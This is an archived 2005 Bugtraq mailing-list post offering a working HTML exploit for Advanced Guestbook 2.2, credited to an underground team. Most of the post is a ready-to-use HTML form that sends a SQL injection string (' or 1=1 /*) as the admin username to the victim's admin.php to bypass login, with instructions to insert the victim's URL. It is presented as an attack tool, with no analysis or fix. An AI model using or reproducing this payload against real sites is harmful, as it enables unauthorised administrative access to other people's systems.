lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20051216184458.24236.qmail@securityfocus.com>
Date: 16 Dec 2005 18:44:58 -0000
From: irc0d3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: exploit (html) for Advanced Guestbook 2.2


In GOD We Trust;
Kachal667 Under9round Team (KuT)
new exploit with HTML for Advanced Guestbook 2.2 .
This bug found by BHST.
Coded By Hessam-x
Note : For use this exploit first change [target] to victim example : www.targetsite.com/guestbook/admin.php
=====HTML CODE :
<html>
<title>GuestBook 2.2 exploit</title>
<B>Guest Book 2.2 Exploit - coded by Hessam-x - </B>
<B>change "[target]" to Target in source code</B>
<!-- CHANGE [target] to target url / coded by hessam-x @ Kachal667 underground Team --!>
<form method="POST" action="http://[target]/admin.php">
<input type="hidden" name="username" value=" ' or 1=1 /*">
<input type="hidden" name="password" value="">
<input type="hidden" name="enter" value="1">
<center><input type="submit" value="GO" class="input"></center>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ